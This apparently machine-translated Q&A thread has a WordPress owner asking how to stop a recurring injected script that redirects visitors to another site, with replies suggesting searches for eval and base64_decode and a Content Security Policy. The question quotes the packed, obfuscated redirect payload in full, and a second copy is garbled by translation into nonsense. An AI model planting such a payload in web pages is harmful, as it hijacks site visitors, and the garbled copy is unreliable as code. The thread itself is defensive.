Wordpress上的Javascript注入预防

我在wordpress上的博客注入了以下恶意脚本：

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('3.5.4="6://%1%0%0%9%2%8%7%1%2/";',10,10,'78|6F|6D|window|href|location|http|63|2E|74'.split('|'),0,{}))

“代码>评估（功能（p，a，c，k，c，c，c，c，k，e，e，e，d）{e=功能（c）{返回（c35？字符串.从Char代码（c+29）：c.toString（c，a，a，a，c.评估（c，c，c，c，c，c，c，c，c，c，c，p，c，c，c，c，c，c，c，c，c，c，c，c，c，c，p，c，c，c，c，c，c，p，c，c，c，c，c，c，c，c，p，c，c，c，c，c，c，p，c，c，c，c，c，c，p，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，6://%1%0%0%9%2%8%7%1%2/“|'，10,10，'78 | 6F | 6D | window | href | location | http | 63 | 2E | 74'。拆分（'124;'），0，{}） 它导航到：

• http://oxxtm.com/

  它重定向到：

  • http://www.html5website.com/

我已经禁用了一些插件，但问题似乎出在其他地方，因为我正在使用以下插件，它们似乎有很好的声誉：

• 阿基斯米特
• 登录时验证码
• 免费和简单的联系形式插件-盗版形式（由我的Zerif Lite主题推荐）
• SMTP邮递员
• 吴哥商业

如果我找不到根本原因，您会建议处理“重定向”事件以保持站点运行吗？如果是，如果有指向

http://oxxtm.com/

并使用javascript中止它

我尝试使用

onunload

和

onbeforeunload

事件，但似乎注入的

eval

甚至在注册事件操纵之前运行

我可以在wordpress中看到它被注入到不同的PHP页面（有时只有一个，有时更多），我不知道是否有一个常见的PHP文件，其中我可以包含一个脚本来防止这个恶意脚本的行为

---

我已经多次删除了恶意脚本，但是它被再次注入&再次注入。我需要治疗的症状，而我搜索的原因，否则该网站将停止服务。但是，我不明白脚本首先是如何注入的。

在所有文件中搜索以下内容：

eval（function（）

它将显示包含此代码的每个文件

否则，请尝试搜索此项：

base64\u decode

这是一个允许对base64编码文本进行解码的函数，恶意PHP文件经常使用它来注入一些无法通过搜索

eval（

---

如果问题仍然存在，请在此处回答，我将尽力帮助您。

此外，作为保护客户端免受XSS攻击的附加功能，我可以建议您在从注入中清理后端后使用CSP。您可以阅读更多有关它的信息：它不是一个银弹，但很高兴有它来保护用户。

而不是处理用户症状，例如重定向，找到受感染的文件并删除恶意代码。@PatrickEvans我已经删除了几次，但它又被注射了。我需要在搜索原因时处理症状。